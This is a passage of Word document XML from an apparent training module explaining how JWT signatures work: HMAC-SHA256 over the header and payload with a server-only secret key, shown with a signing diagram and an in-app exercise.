          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The signature is what makes JWT secure. It is a cryptographic hash calculated from the header and payload using a secret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E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HMAC-SHA256(</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  base64url(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">header</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">) + '.' + base64url(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFD27A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B8A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">secretKey</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   // ONLY the server knows this!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">// Result: SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</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875A" w:sz="4"/>
              <w:left w:val="single" w:color="00875A" w:sz="24"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="4"/>
              <w:right w:val="single" w:color="00875A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00875A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  The Signature Guarantees Two Things</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Authenticity — only someone with the server's secret key could have created this signature.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Integrity — if anyone changes even one character in the header or payload, the signature will not match, and the server will reject the token.</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The three parts of a JWT are:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The payload is NOT encrypted — this means:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The signature proves:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pP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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="004D26" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="34"/>
                <w:szCs w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">Signature — The Core Security Mechanism</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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Module 06 in the app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Show Signing Process  — watch the formula animate: Header + Payload + Secret Key → Signature.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Notice that the secret key is always highlighted in red — it is the most sensitive part.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ask yourself: if someone steals the token but not the key, can they modify it?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">How the Signing Process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875A" w:sz="8"/>
              <w:left w:val="single" w:color="00875A" w:sz="8"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="8"/>
              <w:right w:val="single" w:color="00875A" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="08111E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="320"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="320"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">   ┌──────────────┐   ┌──────────────┐   ┌──────────────────┐</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">   │    HEADER    │ + │   PAYLOAD    │ + │   SECRET KEY     │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">   │  (Base64URL) │   │  (Base64URL) │   │  (server only!)  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">   └──────┬───────┘   └──────┬───────┘   └────────┬─────────┘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">          │                  │                     │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">          └──────────────────┴─────────────────────┘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                              │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                        HMAC-SHA256()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                              │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                              ▼</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                    ┌──────────────────────┐</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                    │     SIGNATURE        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                    │  SflKxwRJSMeKKF2...  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                    └──────────────────────┘</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ✓  Secret key NEVER leaves the server</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ✓  Without the secret, nobody can create a valid signature</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ✓  Changing ANYTHING in header/payload makes the signature wrong</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
